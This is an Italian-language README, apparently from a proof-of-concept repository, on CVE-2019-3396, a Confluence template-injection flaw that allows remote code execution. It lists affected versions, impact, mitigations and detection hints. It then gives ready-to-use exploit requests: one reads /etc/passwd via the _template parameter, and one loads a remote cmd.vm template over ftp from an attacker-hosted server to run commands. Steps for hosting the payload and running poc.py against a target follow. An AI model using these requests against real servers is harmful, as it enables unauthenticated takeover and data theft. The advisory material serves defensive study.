CVE-2019-3396
CVE-2019-3396 confluence SSTI RCE
🔎 Cos'è CVE-2019-3396?
- Un bug critico di Confluence (Atlassian).
- Tipo: Template Injection + Path Traversal.
- Rischio: Remote Code Execution (RCE) senza login.
- Stato: Sfruttato attivamente.
🛑 Versioni Affette
- 6.6.0 → 6.6.11 ❌ vulnerabile
- 6.6.12 ✅ corretto
- 6.12.0 → 6.12.2 ❌ vulnerabile
- 6.12.3 ✅ corretto
- 6.13.0 → 6.13.2 ❌ vulnerabile
- 6.13.3 ✅ corretto
- 6.14.0 → 6.14.1 ❌ vulnerabile
- 6.14.2 ✅ corretto
👉 Controlla sempre l'avviso ufficiale di Atlassian per i dettagli completi.
💥 Impatto
- Presa di controllo completa del server
- Furto di dati, ransomware, crypto-miners
- Gli attaccanti possono eseguire qualsiasi codice desiderano
🔐 Mitigazione
- ✅ Aggiornamento alla versione patchata di Confluence (migliore soluzione)
- 🚫 Disabilita la macro Widget Connector se non puoi applicare la patch immediatamente
- 🔒 Limita l'accesso (solo interno finché non viene risolto)
👀 Rilevamento (consigli sicuri)
- Controlla i log per richieste strane verso gli endpoint macro/preview
- Cerca processi anomali o traffico in uscita
- Usa scanner di vulnerabilità per confermare la versione
📂 Leggi File
POST /rest/tinymce/1/macro/preview HTTP/2
Host: {***}
{"macro":{"params":{"_template":"file:///etc/passwd"}}}
Esegui Comando
POST /rest/tinymce/1/macro/preview HTTP/2
Host: ***
{"contentId":"1","macro":{"name":"widget","params":{"_template":"ftp://***:8888/cmd.vm","command":"id"},"body":""}}
Automazione
- carica cmd.vm sul tuo VPS
- usa ftp o https per creare un collegamento a questo file cmd.vm tramite
pip install pyftpdlib
python -m pyftpdlib -p 8888
- aggiorna il file poc.py con il nuovo valore per pyftp = "ftp://10.100.10.100:8888/cmd.vm"
python poc.py <url> <cmd>
python poc.py https://ip:port "id"
⚠️ Suggerimento — questo repository è solo per istruzione, difesa e consapevolezza.
🔗 Riferimenti